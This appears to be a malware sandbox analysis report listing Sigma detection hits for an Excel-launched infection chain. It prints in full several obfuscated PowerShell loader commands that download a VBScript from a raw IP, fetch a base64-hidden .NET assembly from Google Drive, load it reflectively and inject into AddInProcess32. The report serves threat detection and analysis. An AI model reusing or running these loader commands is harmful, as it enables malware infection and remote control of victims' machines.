      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt, ProcessId: 3876, ProcessName: powershell.exe
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , ProcessId: 4080, ProcessName: wscript.exe
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmlt
      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline", ProcessId: 3980, ProcessName: csc.exe
      Sigma detected: Excel Network Connections
      Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 24.199.88.84, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3404, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3772, TargetFilename: C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS
      Sigma detected: Suspicious Office Outbound Connections
      Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3404, Protocol: tcp, SourceIp: 24.199.88.84, SourceIsIpv6: false, SourcePort: 443
      Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87,
      Sigma detected: Usage Of Web Request Commands And Cmdlets
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87,
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS" , ProcessId: 4080, ProcessName: wscript.exe
      Sigma detected: Dynamic CSharp Compile Artefact
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3772, TargetFilename: C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline
      Sigma detected: Modification of IE Registry Settings
